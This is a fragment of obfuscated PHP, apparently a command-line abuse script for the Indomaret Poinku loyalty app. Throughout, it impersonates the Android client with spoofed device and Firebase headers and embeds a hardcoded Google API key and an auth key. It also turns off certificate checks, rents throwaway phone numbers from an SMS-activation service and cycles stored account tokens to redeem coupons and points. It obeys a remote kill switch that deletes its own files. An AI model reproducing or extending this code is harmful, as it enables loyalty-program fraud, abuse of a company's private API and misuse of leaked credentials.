    $ruc3h[] = "apps: {"app_version":"3.13.0","device_class":"Phone","device_family":"" . $GOXkU . "","device_id":"" . $aY0el . "","os_name":"Android P","os_version":"Android 9"}"; 
    goto yZMA9; 
    J9PJf: 
    curl_setopt($C6npe, CURLOPT_COOKIEJAR, "indo.txt"); 
    goto d73QJ; 
    OrR4Y: 
    curl_setopt($C6npe, CURLOPT_POST, 1); 
    goto FRiaM; 
    g5Bbr: 
    curl_setopt($C6npe, CURLOPT_HTTPHEADER, $ruc3h); 
    goto LkGaS; 
    S2I6r: 
    $ruc3h = substr($ECuqv, 0, curl_getinfo($C6npe, CURLINFO_HEADER_SIZE)); 
    goto y4Il4; 
    d73QJ: 
    curl_setopt($C6npe, CURLOPT_COOKIEFILE, "indo.txt"); 
    goto cA0qm; 
    pUTjL: 
    curl_setopt($C6npe, CURLOPT_POSTFIELDS, $wDisp); 
    goto J9PJf; 
    PtC6x: 
    $ruc3h[] = "content-type: application/json; charset=UTF-8"; 
    goto C_LBw; 
    ly61Y: 
    curl_setopt($C6npe, CURLOPT_FOLLOWLOCATION, true); 
    goto WclWD; 
    DBEzh: 
    WJ4pk: 
    goto RWQQk; 
    gocLI: 
    $ruc3h[] = "user-agent: okhttp/5.0.0-alpha.2"; 
    goto PtC6x; 
    o9fiJ: 
    return $ECuqv; 
    goto Azywb; 
    y4Il4: 
    $y7f11 = substr($ECuqv, curl_getinfo($C6npe, CURLINFO_HEADER_SIZE)); 
    goto vXuAL; 
    C_LBw: 
    $ruc3h[] = "key: ZWR0czIwMjE6MHBsbW9rbg=="; 
    goto ZGi3i; 
    RWQQk: 
    $AXlcQ = json_decode($y7f11, true); 
    goto wNZRx; 
    nwit0: 
    curl_setopt($C6npe, CURLOPT_URL, $lEbop); 
    goto ly61Y; 
    LkGaS: 
    curl_setopt($C6npe, CURLOPT_SSL_VERIFYPEER, 0); 
    goto pUTjL; 
    offcT: 
    XDUd2: 
    goto ccR_h; 
    ccR_h: 
    return false; 
    goto DBEzh; 
    vXuAL: 
    goto WJ4pk; 
    goto offcT; 
    Hn619: 
    $P7lm9 = curl_getinfo($C6npe); 
    goto Wn9Ip; 
    yZMA9: 
    curl_setopt($C6npe, CURLOPT_AUTOREFERER, true); 
    goto g5Bbr; 
    cA0qm: 
    $ECuqv = curl_exec($C6npe); 
    goto Hn619; 
    Wn9Ip: 
    if (!$P7lm9) { 
      goto XDUd2; 
    } 
    goto S2I6r; 
    EniPp: 
    $C6npe = curl_init(); 
    goto nwit0; 
    wNZRx: 
    print_r($AXlcQ); 
    goto o9fiJ; 
    FRiaM: 
    $ruc3h[] = "authorization: Bearer " . $mlMLt; 
    goto gocLI; 
    WclWD: 
    curl_setopt($C6npe, CURLOPT_RETURNTRANSFER, 1); 
    goto OrR4Y; 
    Azywb: 
  } 
  goto dMR2J; 
  hm9FI: 
  if (!($fUekS == '')) { 
    goto qWFPI; 
  } 
  goto K0_3X; 
  s8ivf: 
  echo "
"; 
  goto XttWW; 
  OUrjF: 
  $upOL9 = G8Pf2("https://edtsapp.indomaretpoinku.com/coupon/apix-1502-api/mobile/coupon-detail/" . $KOeAA, $aY0el, $GOXkU, $mlMLt); 
  goto jZ12F; 
  yyp1X: 
  if (!($fUekS == '')) { 
    goto AQDm2; 
  } 
  goto X1oV7; 
  CAT9c: 
  @unlink("poinhp.php"); 
  goto e3Mm3; 
  o6KxG: 
  $jTEU0++; 
  goto GHojT; 
  gZGkC: 
  die; 
  goto p4P9K; 
  oX0a1: 
  if (!($Pud0o == "true")) { 
    goto kZBrv; 
  } 
  goto IGAYC; 
  KaJPP: 
  echo @zM6ic("yellow", "Deskripsi    : "); 
  goto XR1ud; 
  YBxi2: 
  echo "
"; 
  goto U3tV5; 
  W5Geu: 
  echo "
"; 
  goto b91Vm; 
  pcqM1: 
  die; 
  goto sThR9; 
  CFWEW: 
  error_reporting(0); 
  goto vLml6; 
  BrlON: 
  $zvt88 = $QRhbE; 
  goto rYgvk; 
  ZCLXd: 
  echo "
"; 
  goto ShFpT; 
  jSqDU: 
  $xzAuu = @$owfHy["data"][$dQ8Tp]["value"]; 
  goto wKmCR; 
  dLuPN: 
  $m0f8X = explode("
", @file_get_contents("mytoken")); 
  goto VFf4p; 
  EI_SP: 
  FnQw9: 
  goto DTgzm; 
  tRih6: 
  echo @Zm6iC("yellow", " 14 . Tambah Alamat\xa"); 
  goto E9ri5; 
  M6TPS: 
  $wZnHP = $lPULW[$jTEU0]; 
  goto dcLCq; 
  a_Y_v: 
  $m5BZY = gGGR_("https://asia-southeast2-idm-corp-prd.cloudfunctions.net/idmapps_tracker_gateway", $wDisp); 
  goto V9uWz; 
  ge0DY: 
  goto NlIKW; 
  goto zeVAA; 
  pnaf0: 
  goto q9_1d; 
  goto D3Nkz; 
  FytSC: 
  echo @ZM6IC("green", "Status : "); 
  goto jpuIB; 
  Z2FTO: 
  function JLW7P($lEbop, $wDisp = null) 
  { 
    goto iyyy0; 
    w6X4y: 
    uyZrm: 
    goto ogerB; 
    AoKyB: 
    $ruc3h = substr($ECuqv, 0, curl_getinfo($C6npe, CURLINFO_HEADER_SIZE)); 
    goto vx81b; 
    vgUbo: 
    if (!$P7lm9) { 
      goto O1zJq; 
    } 
    goto AoKyB; 
    NIKGY: 
    $ruc3h[] = "x-firebase-client-log-type: 3"; 
    goto rOIqI; 
    PqNnW: 
    $ruc3h[] = "User-Agent: Dalvik/2.1.0 (Linux; U; Android 9; Redmi 5 Plus Build/PQ3A.190801.002)"; 
    goto Tyd5r; 
    P9lPj: 
    $ruc3h[] = "Content-Type: application/json"; 
    goto ppCJ_; 
    LCrT2: 
    curl_setopt($C6npe, CURLOPT_COOKIEFILE, "klik.txt"); 
    goto Fep1S; 
    cMIRN: 
    curl_setopt($C6npe, CURLOPT_AUTOREFERER, true); 
    goto pAfQa; 
    HWN69: 
    curl_setopt($C6npe, CURLOPT_POST, 1); 
    goto KlcPa; 
    O8LMB: 
    curl_setopt($C6npe, CURLOPT_RETURNTRANSFER, 1); 
    goto HWN69; 
    KN1e1: 
    O1zJq: 
    goto FhIFS; 
    LP0bY: 
    $ruc3h[] = "X-Android-Cert: A04FF9360D853349782EC0B69EDDDAFBE2F55C18"; 
    goto aAbXU; 
    z1rS_: 
    return $ECuqv; 
    goto RduBd; 
    Fep1S: 
    $ECuqv = curl_exec($C6npe); 
    goto FiJVW; 
    DXpD4: 
    curl_setopt($C6npe, CURLOPT_POSTFIELDS, $wDisp); 
    goto H1MJd; 
    LInEs: 
    curl_setopt($C6npe, CURLOPT_URL, $lEbop); 
    goto HgkHm; 
    HgkHm: 
    curl_setopt($C6npe, CURLOPT_FOLLOWLOCATION, true); 
    goto O8LMB; 
    INC3m: 
    goto uyZrm; 
    goto KN1e1; 
    Tyd5r: 
    $ruc3h[] = "Connection: Keep-Alive"; 
    goto cMIRN; 
    vqpJB: 
    print_r($AXlcQ); 
    goto z1rS_; 
    FiJVW: 
    $P7lm9 = curl_getinfo($C6npe); 
    goto vgUbo; 
    aAbXU: 
    $ruc3h[] = "x-goog-api-key: AIzaSyBaP3PQ6uohRZ8QNdr4dD_SScoTCtaF7ok"; 
    goto P9lPj; 
    FhIFS: 
    return false; 
    goto w6X4y; 
    ogerB: 
    $AXlcQ = json_decode($y7f11, true); 
    goto vqpJB; 
    KlcPa: 
    $ruc3h[] = "x-firebase-client: fire-cls/18.2.4 android-target-sdk/31 kotlin/1.5.31 fire-core-ktx/20.0.0 fire-cls-ktx/18.2.4 fire-core/20.0.0 fire-cfg-ktx/21.0.1 fire-android/28 fire-fcm/23.0.0 fire-abt/21.0.0 android-installer/com.android.vending fire-installations/17.0.0 fire-rc/21.0.1 fire-analytics-ktx/20.0.0 device-name/lineage_vince fire-analytics/20.0.0 device-model/vince android-min-sdk/21 android-platform/ device-brand/Xiaomi"; 
    goto NIKGY; 
    vx81b: 
    $y7f11 = substr($ECuqv, curl_getinfo($C6npe, CURLINFO_HEADER_SIZE)); 
    goto INC3m; 
    ppCJ_: 
    $ruc3h[] = "Accept: application/json"; 
    goto PqNnW; 
    H1MJd: 
    curl_setopt($C6npe, CURLOPT_COOKIEJAR, "klik.txt"); 
    goto LCrT2; 
    rOIqI: 
    $ruc3h[] = "X-Android-Package: mypoin.indomaret.android"; 
    goto LP0bY; 
    pAfQa: 
    curl_setopt($C6npe, CURLOPT_HTTPHEADER, $ruc3h); 
    goto wWMQA; 
    wWMQA: 
    curl_setopt($C6npe, CURLOPT_SSL_VERIFYPEER, 0); 
    goto DXpD4; 
    iyyy0: 
    $C6npe = curl_init(); 
    goto LInEs; 
    RduBd: 
  } 
  goto gC9XY; 
  qBoxd: 
  if (!($yy9BI < $DxrJr)) { 
    goto bI4pG; 
  } 
  goto bHvhe; 
  z7S0Y: 
  $Jk9cx = g8PF2("https://edtsapp.indomaretpoinku.com/customer/apix-1502-api/mobile/detail-customer-origin", $aY0el, $GOXkU, $mlMLt); 
  goto MK_kh; 
  pDwqG: 
  echo "
"; 
  goto yxAIq; 
  vj_Vw: 
  $jTEU0; 
  goto fXbxp; 
  vsRDz: 
  echo $jTEU0; 
  goto z7S0Y; 
  fH8o7: 
  $wDisp = "{"userId":" . $R_bYC . ","deviceType":"01","deviceId":"" . $aY0el . "","fcmToken":"" . $WYrgv . ":APA91bFt9WuOdnYit_hOvqmHC2uMGiiCwp_u8JgO0kB3sgYQNxoWqO57EEYpAAAVjjDCY8C4j-ePHCYG6Mgcg85RehNO33xt1RRP6DIPVu36qkFHdkfQ9GeTDH8WFrSaiiBzkeZGm9wp"}"; 
  goto ozeA_; 
  i29Nz: 
  $wDisp = ''; 
  goto TeXIq; 
  HcczB: 
  echo "\xa"; 
  goto Q5jat; 
  owgsu: 
  echo @ZM6ic("red", "
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\xa"); 
  goto NYvnF; 
  ffkgN: 
  if (!($fUekS == '')) { 
    goto mZtnb; 
  } 
  goto Tgd35; 
  wkpJu: 
  EIaaQ: 
  goto DFm1c; 
  c7EKQ: 
  echo @Zm6iC("yellow", "Postal Code   : "); 
  goto X6t3o; 
  s0too: 
  $m5BZY = GGgr_("https://asia-southeast2-idm-corp-prd.cloudfunctions.net/idmapps_tracker_gateway", $wDisp); 
  goto SD9A7; 
  rNvLE: 
  if (!unlink($xp_1p)) { 
    goto sa5ia; 
  } 
  goto xzo8f; 
  C3iNo: 
  echo @zM6iC("red", "Yah... Ayam Nya Ga Ada , Akan Di Cek Kembali..."); 
  goto cAIMe; 
  nof22: 
  $Jk9cx = G8pF2("https://edtsapp.indomaretpoinku.com/customer/apix-1502-api/is-whatsapp-verified", $aY0el, $GOXkU, $mlMLt); 
  goto bvGw_; 
  Ghhvp: 
  $fUekS = trim(file_get_contents("https://irfan.iproute.my.id/ipoinx/medansi/poinmastif")); 
  goto fDZVQ; 
  uC_Nz: 
  $owfHy = json_decode($o0WQD, true); 
  goto zhjgh; 
  CcQD1: 
  echo @zm6iC("nevy", "        AAMIIN "); 
  goto n9nIa; 
  ahhce: 
  echo $yy9BI . ". "; 
  goto Bj4_J; 
  a4SB4: 
  echo @ZM6iC("red", "NOTICE !! : \xa"); 
  goto VOfPN; 
  jibTK: 
  curl_setopt($C6npe, CURLOPT_SSL_VERIFYPEER, false); 
  goto evno_; 
  vKN4h: 
  die; 
  goto nODjW; 
  cWc10: 
  ZQCA7: 
  goto kPhu0; 
  ALS0m: 
  goto CIb70; 
  goto mdOEh; 
  nMz0f: 
  echo "
"; 
  goto rnY5C; 
  RPGGf: 
  $wDisp = ''; 
  goto wPlvB; 
  rX_9S: 
  $qaGLY = str_replace("-", '', $AxbWA); 
  goto y0A3r; 
  Y2gfk: 
  $p4iky = @$Ap1KM["data"]["memberId"]; 
  goto Vqsgq; 
  lzQ4l: 
  echo @Zm6Ic("green", $wd9cN); 
  goto CH3Nn; 
  i2jbT: 
  goto KwD0u; 
  goto OpF1q; 
  ZNBgL: 
  echo @ZM6IC("yellow", "      SC GARAPAN IDM POINKU
"); 
  goto Y8zV2; 
  zxkeE: 
  $v1ZMX = str_replace("\xd", '', $wPFxB); 
  goto D7qnE; 
  MxBPD: 
  $wDisp = ''; 
  goto GLRDO; 
  A8e5b: 
  echo @zm6ic("nevy", $BW_8H); 
  goto E30iU; 
  nwH7V: 
  echo "\xa"; 
  goto AIk12; 
  YbjIM: 
  $GOXkU = $w5ulg; 
  goto QV7b_; 
  pg4Im: 
  if (!($ZNU2M == '')) { 
    goto u7NvT; 
  } 
  goto nxIft; 
  iaYFB: 
  goto V7t6B; 
  goto lNcIn; 
  dGJoR: 
  $wDisp = "{"data":[{"application":{"app_version":"3.13.0","device_class":"Phone","device_family":"" . $GOXkU . "","device_id":"" . $aY0el . "","os_name":"Android P","os_version":"Android 9"},"core":{"event_name":"page_view","event_timestamp":" . $nb9cm . ","page_name":"verification","page_urlpath":""},"marketing":{"utm_raw":"utm_source=google-play&utm_medium=organic"},"user":{"session_id":"" . $MXjqh . "","user_ip_address":"127.0.0.1"}}]}"; 
  goto aBtiv; 
  hp69C: 
  echo "\xa"; 
  goto jBZZl; 
  b8dwF: 
  echo @zM6ic("yellow", "Deskripsi : "); 
  goto A8e5b; 
  wSlsQ: 
  $DxrJr = "11"; 
  goto mN1x6; 
  Sc9EK: 
  hLVkj: 
  goto E9Kac; 
  R5OGU: 
  $wDisp = "{"phoneNumber":"" . $zn5zd . "","deviceId":"" . $aY0el . ""}"; 
  goto hjVag; 
  kqX3g: 
  echo "\xa"; 
  goto MwsHo; 
  ZVOO3: 
  if (!($fUekS == '')) { 
    goto eYgid; 
  } 
  goto BQie2; 
  Aq2AZ: 
  $XTuz1 = G1Wxt("https://edtsapp.indomaretpoinku.com/customer/apix-1502-api/mobile/customer-address", $wDisp, $aY0el, $GOXkU, $mlMLt); 
  goto euWkj; 
  Mtb9w: 
  echo "\xa"; 
  goto XGQ70; 
  uWkTX: 
  echo "\xa"; 
  goto utQaz; 
  Vn1b5: 
  $wd9cN = date("d-m-Y | H:i:s"); 
  goto A3f9Q; 
  tRe9c: 
  $Jk9cx = G8pf2("https://edtsapp.indomaretpoinku.com/customer/apix-1502-api/mobile/detail-customer-origin", $aY0el, $GOXkU, $mlMLt); 
  goto XgCp2; 
  t5U4C: 
  GGXBW: 
  goto v81hS; 
  jpdpf: 
  goto hc1uy; 
  goto XiQh1; 
  DpEee: 
  if (!($XDyMm == "0")) { 
    goto f7coE; 
  } 
  goto EGbwm; 
  BCr2g: 
  echo "\xa"; 
  goto zFn3e; 
  hEdN_: 
  echo @zM6IC("green", $wd9cN); 
  goto ZUJjN; 
  Gqhb0: 
  echo "
"; 
  goto IfjVc; 
  Znx5G: 
  $zvt88 = $QRhbE; 
  goto ndPeW; 
  wagK0: 
  $QRhbE = explode("
", @file_get_contents("forceclose")); 
  goto c9VHy; 
  OGVYy: 
  echo @Zm6ic("yellow", "Postal Code ID : "); 
  goto jqBDn; 
  y4a0t: 
  echo "
"; 
  goto tBWs_; 
  nb0l8: 
  goto fzpTX; 
  goto h5zZT; 
  EnReM: 
  echo @ZM6Ic("nevy", $kp_uF); 
  goto i1ZXy; 
  XR1ud: 
  echo @zM6Ic("nevy", $BW_8H); 
  goto A42_x; 
  xkj3T: 
  if (!($zcN5u == '')) { 
    goto FbwVq; 
  } 
  goto Dq8Ho; 
  g_wt9: 
  $QRhbE = explode("
", @file_get_contents("mytoken")); 
  goto TLgtD; 
  QY65c: 
  echo @ZM6IC("green", "[2] {$pew2b} \xa  > {$knJzU} 
\xa"); 
  goto tmNUb; 
  rxO0c: 
  echo "\xa"; 
  goto c7EKQ; 
  FsFpb: 
  echo "\xa"; 
  goto Hd85v; 
  BJavt: 
  @unlink("poinhp.php"); 
  goto RY_tp; 
  trAV2: 
  $v1ZMX = str_replace("\xd", '', $wPFxB); 
  goto Geoq3; 
  MznXj: 
  Eqo5q: 
  goto jX5Xi; 
  PoC5U: 
  if (!($fUekS == '')) { 
    goto Q_Hza; 
  } 
  goto KiRsY; 
  jfbPd: 
  echo "Mulai Baris Ke : "; 
  goto NLM3A; 
  SAFEQ: 
  $nPb0z = json_decode($Jk9cx, true); 
  goto s3nn0; 
  XJ4uX: 
  echo @ZM6iC("nevy", "Sorry, This Script Has Been Removed By The Owner!!"); 
  goto KyXoa; 
  X0B6J: 
  if (!($Y_a4j == '')) { 
    goto J2_16; 
  } 
  goto jWTaT; 
  v1sZj: 
  $XDyMm = @$Ap1KM["data"]["balance"]; 
  goto kMtgl; 
  TnnPp: 
  $S8W9D = trim(fgets(STDIN)); 
  goto OTrdv; 
  scxdN: 
  echo @zm6iC("nevy", $p4iky); 
  goto ziRG0; 
  Q63qh: 
  pfdwZ: 
  goto bf2kg; 
  NBKuI: 
  if (!($IBJ55 == '')) { 
    goto h93oq; 
  } 
  goto pGlLe; 
  fcX90: 
  $zvt88 = $QRhbE; 
  goto T3KX5; 
  KmhR1: 
  $Ap1KM = json_decode($N0XGD, true); 
  goto PVasB; 
  fXDXt: 
  $Ap1KM = json_decode($ofEkP, true); 
  goto cMepj; 
  H6DgW: 
  goto lYTFu; 
  goto RTtKY; 
  BybP1: 
  echo "
"; 
  goto v4487; 
  Sx52J: 
  qHUhy: 
  goto C0X4e; 
  Go01J: 
  $yy9BI; 
  goto wsgYZ; 
  Sszbg: 
  echo "\xa"; 
  goto y8Khm; 
  SriS5: 
  echo @Zm6iC("nevy", "Tekan Enter Untuk Lanjut : "); 
  goto I5RSt; 
  r_nAC: 
  echo $jTEU0; 
  goto Cr9sd; 
  MSy9W: 
  echo "Sampai Baris Ke : "; 
  goto NWybD; 
  zznCp: 
  echo @zM6ic("nevy", $pugmZ); 
  goto OzzD7; 
  tJQnU: 
  $XDyMm = @$Ap1KM["data"]["balance"]; 
  goto R17tK; 
  efhFP: 
  echo $BcbF3; 
  goto ZUFRT; 
  T3KRP: 
  $BcbF3 = @$Ap1KM["data"]["phoneNumber"]; 
  goto cT7sZ; 
  q4c1O: 
  echo @zM6Ic("nevy", "Sorry, This Script Has Been Removed By The Owner!!"); 
  goto Rw10h; 
  xoEHm: 
  echo "
"; 
  goto hKxlt; 
  NCD0t: 
  $zcN5u = XOzb4(array("|"), $wZnHP)[0]; 
  goto OnVQz; 
  mf9wm: 
  echo "
"; 
  goto wfRVl; 
  eMjID: 
  $k1y0B = G1wXt("https://edtsapp.indomaretpoinku.com/customer/apix-1502-api/remove-isaku-token", $wDisp, $aY0el, $GOXkU, $mlMLt); 
  goto mHTY8; 
  BjSHt: 
  echo "
"; 
  goto m280i; 
  rrrlO: 
  lUvmA: 
  goto fxg3h; 
  P16AV: 
  ZjzxQ: 
  goto Eko9L; 
  D0i6Z: 
  $yy9BI++; 
  goto JOHzs; 
  t9SxY: 
  $upOL9 = G8PF2("https://edtsapp.indomaretpoinku.com/loyalty/apix-1502-api/mobile/stamps/me/buckets/" . $e0XZt . "/promotions?unpaged=true&sort=createdDate,desc", $aY0el, $GOXkU, $mlMLt); 
  goto LGPrS; 
  GShuM: 
  iL2Tt: 
  goto P8zZ3; 
  gC9XY: 
  function aUjhZ($lEbop, $wDisp = null, $YYbml) 
  { 
    goto hwDdj; 
    DTOUZ: 
    $ruc3h[] = "Connection: Keep-Alive"; 
    goto KjgQQ; 
    tdwlP: 
    $AXlcQ = json_decode($y7f11, true); 
    goto UlJxV; 
    yD3te: 
    $ruc3h[] = "X-Google-GFE-Can-Retry: yes"; 
    goto UdJHV; 
    dkquh: 
    $ruc3h[] = "X-Android-Package: mypoin.indomaret.android"; 
    goto UL_OF; 
    dnomb: 
    goto H_Rzs; 
    goto aDSnC; 
    NGvA0: 
    $ruc3h[] = "User-Agent: Dalvik/2.1.0 (Linux; U; Android 9; Redmi 5 Plus Build/PQ3A.190801.002)"; 
    goto DTOUZ; 
    DR_7V: 
    curl_setopt($C6npe, CURLOPT_FOLLOWLOCATION, true); 
    goto Ai6n_; 
    C0yMJ: 
    curl_setopt($C6npe, CURLOPT_HTTPHEADER, $ruc3h); 
    goto bt5RA; 
    UL_OF: 
    $ruc3h[] = "X-Android-Cert: A04FF9360D853349782EC0B69EDDDAFBE2F55C18"; 
    goto yD3te; 
    UdJHV: 
    $ruc3h[] = "X-Goog-Firebase-Installations-Auth: " . $YYbml; 
    goto ZAPvT; 
    Ffs7y: 
    return $ECuqv; 
    goto nZa6Q; 
    bt5RA: 
    curl_setopt($C6npe, CURLOPT_SSL_VERIFYPEER, 0); 
    goto WElhE; 
    FJu5f: 
    $ruc3h[] = "If-None-Match: etag-998816605328-firebase-fetch-1750968737"; 
    goto F72jN; 
    gRgbW: 
    H_Rzs: 
    goto tdwlP; 
    jTplO: 
    curl_setopt($C6npe, CURLOPT_URL, $lEbop); 
    goto DR_7V; 
    hwDdj: 
    $C6npe = curl_init(); 
    goto jTplO; 
    LyDeF: 
    curl_setopt($C6npe, CURLOPT_COOKIEJAR, "klik.txt"); 
    goto XC0dv; 
    ZAPvT: 
    $ruc3h[] = "Content-Type: application/json"; 
    goto NAfxb; 
    CLJKH: 
    $ruc3h = substr($ECuqv, 0, curl_getinfo($C6npe, CURLINFO_HEADER_SIZE)); 
    goto PpvC9; 
    jPVdu: 
    $ECuqv = curl_exec($C6npe); 
    goto Icc0S; 
    KjgQQ: 
    curl_setopt($C6npe, CURLOPT_AUTOREFERER, true); 
    goto C0yMJ; 
    UlJxV: 
    print_r($AXlcQ); 
    goto Ffs7y; 
    F72jN: 
    $ruc3h[] = "X-Goog-Api-Key: AIzaSyBaP3PQ6uohRZ8QNdr4dD_SScoTCtaF7ok"; 
    goto dkquh; 
    ZCEau: 
    if (!$P7lm9) { 
      goto gOFKt; 
    } 
    goto CLJKH; 
    WElhE: 
    curl_setopt($C6npe, CURLOPT_POSTFIELDS, $wDisp); 
    goto LyDeF; 
    jcBo1: 
    return false; 
    goto gRgbW; 
    XC0dv: 
    curl_setopt($C6npe, CURLOPT_COOKIEFILE, "klik.txt"); 
    goto jPVdu; 
    PpvC9: 
    $y7f11 = substr($ECuqv, curl_getinfo($C6npe, CURLINFO_HEADER_SIZE)); 
    goto dnomb; 
    aDSnC: 
    gOFKt: 
    goto jcBo1; 
    Icc0S: 
    $P7lm9 = curl_getinfo($C6npe); 
    goto ZCEau; 
    Ai6n_: 
    curl_setopt($C6npe, CURLOPT_RETURNTRANSFER, 1); 
    goto SkFCV; 
    NAfxb: 
    $ruc3h[] = "Accept: application/json"; 
    goto NGvA0; 
    SkFCV: 
    curl_setopt($C6npe, CURLOPT_POST, 1); 
    goto FJu5f; 
    nZa6Q: 
  } 
  goto dyoyZ; 
  zYTlH: 
  kZBrv: 
  goto EAifF; 
  MkfQF: 
  echo @zM6ic("nevy", " SEMOGA LOBANG PANTAT NYA BISULAN!!!!! \xa"); 
  goto Sk1M_; 
  mPckR: 
  die; 
  goto cSbKL; 
  vCHP8: 
  $gIJCo = json_decode($gIJCo, true); 
  goto JEsx3; 
  MJ4XI: 
  $QRhbE = explode("
", @file_get_contents("forceclose")); 
  goto ayaqJ; 
  sTQjT: 
  echo @zM6iC("green", $wd9cN); 
  goto QzPor; 
  LzqPy: 
  echo @ZM6ic("yellow", "| WA 082176358295 
"); 
  goto C0b6j; 
  TaqSA: 
  $xp_1p = "klik.txt"; 
  goto uP7Pk; 
  okpAe: 
  echo "
"; 
  goto VfGJN; 
  QLRL1: 
  $wDisp = "{"data":[{"application":{"app_version":"3.13.0","device_class":"Phone","device_family":"" . $GOXkU . "","device_id":"" . $aY0el . "","os_name":"Android P","os_version":"Android 9"},"core":{"details":{"isaku_status":"Hubungkan"},"event_name":"page_detail","event_timestamp":" . $nb9cm . ","page_name":"isaku"},"marketing":{"utm_raw":"utm_source=google-play&utm_medium=organic"},"user":{"session_id":"" . $MXjqh . "","user_id":" . $R_bYC . ","user_ip_address":"127.0.0.1"}}]}"; 
  goto lyjUC; 
  daCzy: 
  echo @Zm6Ic("yellow", " - Harap Teliti Dalam Menggunakan Script
"); 
  goto eqpXU; 
  CX3Ha: 
  echo $BcbF3; 
  goto xoWJi; 
  QXpWd: 
  echo @zm6IC("nevy", $tJqX7); 
  goto D0LEk; 
  ufeHC: 
  $jTEU0++; 
  goto v0pQL; 
  Gs7s7: 
  echo @Zm6Ic("yellow", "Nama Penerima  : "); 
  goto a2PpR; 
  xz1rM: 
  $earOL = $sONlZ; 
  goto Mr9wz; 
  VXnb2: 
  echo "
"; 
  goto jfbPd; 
  nSNur: 
  echo "\xa"; 
  goto vsMZx; 
  NIIPa: 
  echo @Zm6iC("nevy", $YXsOG); 
  goto VvV7s; 
  djw9a: 
  $RJnNP = trim(fgets(STDIN)); 
  goto yAXnQ; 
  zs8V0: 
  $a7K8a = AuJHZ("https://firebaseremoteconfig.googleapis.com/v1/projects/998816605328/namespaces/firebase:fetch", $wDisp, $YYbml); 
  goto G0IiA; 
  dZum6: 
  goto hLVkj; 
  goto cED13; 
  VO7F2: 
  echo @Zm6ic("red", "\xa~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\xa"); 
  goto Cqx0O; 
  jiAUE: 
  echo "
"; 
  goto lqIFf; 
  AtJEi: 
  $u35jw = count($m0f8X) - 1; 
  goto vI4fi; 
  Tg2Pm: 
  $OtngW = $eqo_P; 
  goto HrdBY; 
  NLM3A: 
  $jTEU0 = trim(fgets(STDIN)); 
  goto FRrum; 
  XGDc2: 
  echo @zm6ic("yellow", "| WA 082176358295 \xa"); 
  goto mwNvq; 
  EaXxp: 
  $zcN5u = XOZB4(array("|"), $tqWr2)[0]; 
  goto oLXie; 
  oFFPR: 
  eFIM1: 
  goto mTGZw; 
  WVkb3: 
  vRTIW: 
  goto E3UbE; 
  KN2v8: 
  goto fzpTX; 
  goto tz8wc; 
  yRdKx: 
  $ogbF4 = "10000000"; 
  goto E7eXl; 
  Qm56f: 
  @unlink("poin"); 
  goto Qvm57; 
  KvSHm: 
  echo @ZM6Ic("nevy", $p4iky); 
  goto yqzNQ; 
  b_gi8: 
  $S8W9D = trim(fgets(STDIN)); 
  goto lJl7c; 
  kiloP: 
  $wDisp = "{"couponId":"" . $Qa1_P . "","qty":1.0,"pointExchangeId":"" . $VJtH7 . ""}"; 
  goto QwhGW; 
  Ul8XG: 
  die; 
  goto tx212; 
  Y4tmI: 
  echo "
"; 
  goto mM1Qy; 
  Lbb3x: 
  echo @ZM6IC("red", "\xa~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\xa"); 
  goto S2q_E; 
  dRer4: 
  $QRhbE = explode("\xa", @file_get_contents("forceclose")); 
  goto jYjqX; 
  XN9Lf: 
  $WvHe1 = @$lImQC["data"]["content"][6]["couponCode"]; 
  goto YVULM; 
  Jwbfk: 
  echo @zm6IC("yellow", "Masukkan Email Penerima : "); 
  goto rn4By; 
  TZuPQ: 
  echo @ZM6iC("nevy", "Akun Ke    : "); 
  goto eryO5; 
  pIWJg: 
  $Ap1KM = json_decode($xT15V, true); 
  goto oeXWG; 
  Sgp3W: 
  @unlink("poinhp.php"); 
  goto nJUpr; 
  hJQHr: 
  $Jk9cx = g8Pf2("https://edtsapp.indomaretpoinku.com/customer/apix-1502-api/mobile/detail-customer-origin", $aY0el, $GOXkU, $mlMLt); 
  goto aopGf; 
  OJgKJ: 
  $Ia9Ix = Z82DB("https://sms-activate.ru/stubs/handler_api.php?owner=5&api_key=" . $rVPVc . "&action=getStatus&market_id=1&sessionId=86f4bf31c145b15d073d5bd58bc9120e&id=" . $jU3Co); 
  goto sHcge; 
  n2vj8: 
  $D2zwh = "0"; 
  goto fs5BL; 
  NqMIz: 
  shell_exec("start chrome "https://barcode.tec-it.com/barcode.ashx?data="" . $p4iky . ""&code=Code128&multiplebarcodes=false&translate-esc=true&unit=Fit&dpi=96&imagetype=Gif&rotation=0&color=%23000000&bgcolor=%23ffffff&codepage=Default&qunit=Mm&quiet=10&hidehrt=False""); 
  goto jgsP1; 
  NXRyP: 
  gbJTu: 
  goto RV_I1; 
  VJNKS: 
  shell_exec("start chrome "https://barcode.tec-it.com/barcode.ashx?data="" . $QG8my . ""&code=Code128&multiplebarcodes=false&translate-esc=true&unit=Fit&dpi=96&imagetype=Gif&rotation=0&color=%23000000&bgcolor=%23ffffff&codepage=Default&qunit=Mm&quiet=10&hidehrt=False""); 
  goto JlfKN; 
  vkYxU: 
  $m5BZY = GGGR_("https://asia-southeast2-idm-corp-prd.cloudfunctions.net/idmapps_tracker_gateway", $wDisp); 
  goto OplG0; 
  DgaoM: 
  $GOXkU = $w5ulg; 
  goto yDDs8; 
  plK7Z: 
  V9iZ0: 
  goto nT7ar; 
  sfztk: 
  echo @Zm6Ic("nevy", "     YANG NYEBARIN SCRIPT INI \xa"); 
  goto TpXcJ; 
  ELsW3: 
  die; 
  goto ZbVXq; 
  CBPly: 
  $wDisp = "{"phoneNumber":"" . $zn5zd . "","deviceId":"" . $aY0el . ""}"; 
  goto tMEM6; 
  UdB79: 
  echo @Zm6iC("yellow", "Poin Akun Anda : "); 
  goto cubbE; 
  mhPin: 
  echo @zm6Ic("yellow", "[13] {$t4wQX} \xa  > {$Q6vWf} 
\xa"); 
  goto RgM1e; 
  sNEus: 
